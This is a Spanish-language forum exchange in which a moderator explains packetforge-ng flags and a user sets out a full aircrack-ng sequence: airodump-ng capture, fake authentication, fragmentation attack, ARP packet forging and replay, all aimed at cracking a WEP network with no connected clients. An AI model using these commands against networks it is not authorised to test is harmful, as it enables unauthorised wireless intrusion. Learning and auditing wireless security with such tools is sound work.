Buenas:
¿Hay cliente real asociado o has hecho alguna asociación falsa? NO veo nio lo uno ni lo otro....
-0= Indicamos que vamos a forjar un paquete ARP.
-a = BSSID
-h = MAC de la STATION.
-k IPdestino= IP del BSSID.
-l IPorigen= Es la IP de la STATION conectada.
-y archivochop.xor= Paquete que hemos obtenido con el ataque chopchop.
-w nombrepaquete= Nombre de nuestro nuevo paquete.
Dinos si haces A1 ó A3
Un saludo
ChimoC
P.D.: NO hace falta citar al de arriba (por eso te he editado tu anterior post)
Hola Chimo:
Lo que estoy intentando es siempre sin clientes. (Con clientes ya lo probé y me funcionó).
He probado ataque con defragmentación pero no sé si luego lo hago bien o no.. me explico..
Tengo una WEP en el canal 6.. primero le indico el canal (no hay cliente conectado)...
airodump-ng wlan1 –w “archivo” – c 6
Hago la falsa autentificación...
aireplay-ng -1 0 -e “essid” –a “bessid” –h MI MAC wlan1
Ataque
aireplay-ng -5 -b (BSSID) -h (mac del cliente) wlan1
Me sale lo de "Now yoy can build a packet... y el fragmentxxx.xor"
¿tengo que hacer ahora esto??
packetforge-ng -0 -a (BSSID) -h (mac del cliente) -k 255.255.255.255 -l 255.255.255.255.255 -y (nuestro archivo .xor) -w arp-request
o directamente esto???
aireplay-ng -2 -h (mac del clente) -r arp-request wlan1
Saludos